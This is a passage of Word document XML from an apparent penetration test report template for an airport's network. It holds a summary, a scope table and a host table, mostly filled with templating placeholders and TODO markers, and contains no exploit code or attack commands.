          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000004B" w14:textId="77777777">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>Su</w:t>
      </w:r>
      <w:commentRangeStart w:id="944092629"/>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>mmarized in this rep</w:t>
      </w:r>
      <w:commentRangeEnd w:id="944092629"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="944092629"/>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>ort are the findings from the penetration test on Robert A. Kalka Metropolitan Skyport’s corporate, user, train, and guest subnets. Conducted on January 12</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>-13</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">, 2024, this engagement served as a follow-up to the </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>previous</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> assessment performed on November 11</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">, 2023. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000004C" w14:textId="77777777">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">The goal of this simulated cyber-attack test was to </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>identify</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> and exploit vulnerabilities in the {company.name} infrastructure </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>in order to</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> assess the strength and weaknesses of the infrastructure's security. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000004D" w14:textId="77777777">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">The assessment revealed </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NUMBER</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> critical vulnerabilities and several lower severity issues within the {company.name} in-scope network. Immediate attention is strongly recommended to address these vulnerabilities promptly and mitigate the risk of substantial harm to company assets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000004E" w14:textId="77777777">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Several of the security issues that are detailed in this report are in violation of the PCI-DSS, SOC 2, and TSA cybersecurity compliances for airports and </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>aircraft</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> operators. Violations of the regulations can result in fines ranging from $5,000 to $100,000 per month. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000004F" w14:textId="77777777">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>To enhance overall security measures, {name} suggests that Robart A. Kalka Metropolitan Skyport prioritizes the remediation of these vulnerabilities in a logical sequence, starting with the critical findings before addressing less urgent issues. Additionally, it is advisable for the company to implement employee training programs, focusing on password reuse and complexity, alongside regularly scheduled sessions addressing the awareness and prevention of social engineering attacks. These proactive steps will contribute to strengthening the overall security posture of Robert A. Kalka Metropolitan Skyport.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000050" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000051" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>{#executive_summary.text}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000052" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">{@text | </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>convertHTML</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000053" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>{#images}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000054" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>{%image}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000055" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">Image </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:smallCaps w:val="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> – {caption}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000056" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>{/images}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000057" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>{/</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>executive_summary.text</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000058" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000059" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645185" w:id="7"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">3 Engagement </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000005A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645186" w:id="8"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>3.1 Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000005B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>As instructed by {company.name}, the following subnets were in scope for the engagement:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="0000005C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000005D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.yhkt1uuspj3" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:commentRangeStart w:id="10"/>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>TODO FILL THIS O</w:t>
      </w:r>
      <w:commentRangeEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="10"/>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>UT</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9464" w:type="dxa"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4732"/>
        <w:gridCol w:w="4732"/>
      </w:tblGrid>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="0A01EE3B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4732"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2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000005E" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4732"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2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000005F" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>IP Range (CIDR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="071CF753" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4732"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000060" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Corporate Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4732"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000061" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>10.0.0.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="26B6B091">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4732"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="0BBB914E" w14:textId="7D6473D7">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4732"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="4DFDAF06" w14:textId="5922BD9B">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{-</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>w:p</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>scope}{</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>name}{/scope}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000064" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645187" w:id="11"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Network </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Topology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000065" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>{name}</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> used standard enumeration tools, such as Nmap, to discover and map </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>numerous</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> hosts on the in-scope subnets. The resulting scans allowed us to compile a network topology map of the {company.name} network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000066" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000067" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="00FFFF"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.myhuvkopwkyx" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:commentRangeStart w:id="13"/>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>INSERT IMAGE HERE</w:t>
      </w:r>
      <w:commentRangeEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="13"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000068" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000069" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645188" w:id="14"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1 Machine </w:t>
      </w:r>
      <w:commentRangeStart w:id="15"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
      <w:commentRangeEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="15"/>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9435" w:type="dxa"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2670"/>
        <w:gridCol w:w="1542"/>
        <w:gridCol w:w="2440"/>
        <w:gridCol w:w="1563"/>
        <w:gridCol w:w="1220"/>
      </w:tblGrid>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="7D48CCDE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2670"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2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000006B" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1542"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2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000006C" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2440"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2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000006D" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1563"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2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000006E" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1220"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2690FF"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000006F" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Ports Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="28572E46" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2670"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000075" w14:textId="7068036D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{#</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>scope}{</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>#hosts}{hostname}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1542"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000076" w14:textId="3941CE6B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>{ip}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2440"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000077" w14:textId="3AD19E98">
